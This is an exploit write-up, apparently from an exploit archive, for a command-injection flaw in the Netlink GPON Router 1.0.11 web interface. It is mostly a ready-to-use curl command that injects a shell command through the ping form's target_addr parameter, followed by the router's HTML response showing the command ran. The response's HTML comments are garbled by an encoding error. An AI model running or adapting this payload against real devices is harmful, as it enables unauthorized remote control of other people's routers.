66 lines
No EOL
1.5 KiB
Text
66 lines
No EOL
1.5 KiB
Text
# Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution
|
|
# Date: 2020-03-17
|
|
# Exploit Author: shellord
|
|
# Vendor Homepage: https://www.netlink-india.com/
|
|
# Version: 1.0.11
|
|
# Tested on: Windows 10
|
|
# CVE: N/A
|
|
|
|
Exploit :
|
|
|
|
curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154"
|
|
http://TARGETIP/boaform/admin/formPing
|
|
|
|
Response :
|
|
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
|
|
<!--ϵͳĬģ-->
|
|
<html>
|
|
<head>
|
|
<title>PINGԽ</title>
|
|
<meta http-equiv=pragma content=no-cache>
|
|
<meta http-equiv=refresh content="2">
|
|
<meta http-equiv=cache-control content="no-cache, must-revalidate">
|
|
<meta http-equiv=content-type content="text/html; charset=gbk">
|
|
<meta http-equiv=content-script-type content=text/javascript>
|
|
<!--ϵͳcss-->
|
|
<style type=text/css>
|
|
@import url(/style/default.css);
|
|
</style>
|
|
<!--ϵͳű-->
|
|
<script language="javascript" src="common.js"></script>
|
|
</head>
|
|
|
|
<!-------------------------------------------------------------------------------------->
|
|
<!--ҳ-->
|
|
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"
|
|
alink="#000000" link="#000000" vlink="#000000">
|
|
<blockquote>
|
|
<form>
|
|
<div align="left" style="padding-left:20px;"><br>
|
|
<div align="left"><b>Finish</b>
|
|
<br><br>
|
|
</div>
|
|
<pre>
|
|
bin
|
|
dev
|
|
etc
|
|
home
|
|
image
|
|
lib
|
|
mnt
|
|
proc
|
|
sbin
|
|
sys
|
|
tmp
|
|
usr
|
|
var
|
|
</pre>
|
|
|
|
<input type=button value="back"
|
|
onClick=window.location.replace("/diag_ping_admin_en.asp")>
|
|
</div>
|
|
</form>
|
|
</blockquote>
|
|
</body>
|
|
</html> |